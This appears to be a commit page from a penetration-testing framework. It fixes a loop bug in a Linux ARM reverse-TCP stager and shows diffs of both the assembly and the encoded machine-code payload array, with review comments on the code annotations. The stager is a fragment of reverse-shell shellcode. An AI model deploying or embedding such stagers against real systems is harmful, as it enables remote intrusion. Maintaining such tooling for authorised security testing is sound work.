Land #19367, fix ARM stager restore r0 in loop
Land #19367, fix ARM stager restore r0 in loop
dledda-r7 authored Jan 6, 2025
2 parents e801720 + cdc5122 commit 289e95d
Showing 2 changed files with 3 additions and 3 deletions.
Expand Up @@ -75,10 +75,10 @@ _start:
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
add r7,#99 @ __NR_recv
mov r1,r0 @ *buf
mov r0,r12 @ sockfd
mov r3,#0 @ flags
@ remove blocksize from total length
loop:
mov r0,r12 @ sockfd
ldr r2,[sp,#0]
sub r2,#1000
str r2,[sp,#0]
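Review bot: The `mov r0,r12` that now follows `loop:` carries no record of why it must run on every pass, and it lands between the `@ remove blocksize from total length` comment and the `ldr`/`sub`/`str` lines that comment describes. The reason is presumably that each recv syscall returns its result in r0 and so overwrites the socket descriptor; the `svc` itself is in the collapsed part of this listing, so that is inferred. I would annotate the line as `mov r0,r12 @ sockfd: reloaded each pass, the syscall result overwrites r0` and move the blocksize comment below it. The literal `#1000` could also become a named `.equ` so the block size is defined in one place.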
4 changes: 2 additions & 2 deletions modules/payloads/stagers/linux/armle/reverse_tcp.rb
Expand Up @@ -77,9 +77,9 @@ def initialize(info = {})
0x0a000012, # beq <failed>
0xe2877063, # add r7, r7, #99 ; set 291(0x123) to r7
0xe1a01000, # mov r1, r0
0xe1a0000c, # mov r0, ip
0xe3a03000, # mov r3, #0
# loop:
0xe1a0000c, # mov r0, ip
0xe59d2000, # ldr r2, [sp]
0xe2422ffa, # sub r2, r2, #1000
0xe58d2000, # str r2, [sp]
Expand All @@ -89,7 +89,7 @@ def initialize(info = {})
0xef000000, # svc 0x00000000 ; invoke recv
0xe3500000, # cmp r0, #0
0xba000005, # blt 817c <failed>
0xeafffff5, # b 80dc <loop>
0xeafffff4, # b 80dc <loop>
# last:
0xe2822ffa, # add r2, r2, #1000
0xef000000, # svc 0x00000000 ; invoke recv
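Review bot: The annotation on the rewritten branch word still reads `b 80dc <loop>` although the encoded displacement differs between `0xeafffff5` and `0xeafffff4`, so the absolute address in the comment cannot be right for both encodings. Since `loop:` moved by one instruction while the branch itself stayed in place, the listed target is presumably off by four bytes; either regenerate the disassembly comments or drop the addresses, e.g. `0xeafffff4, # b <loop>`. The same applies to `blt 817c <failed>` if those addresses come from an older build. A one-line comment above the array naming the assembly source it is generated from would help keep the two copies in step; the array and `initialize` start and end outside the visible hunks.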
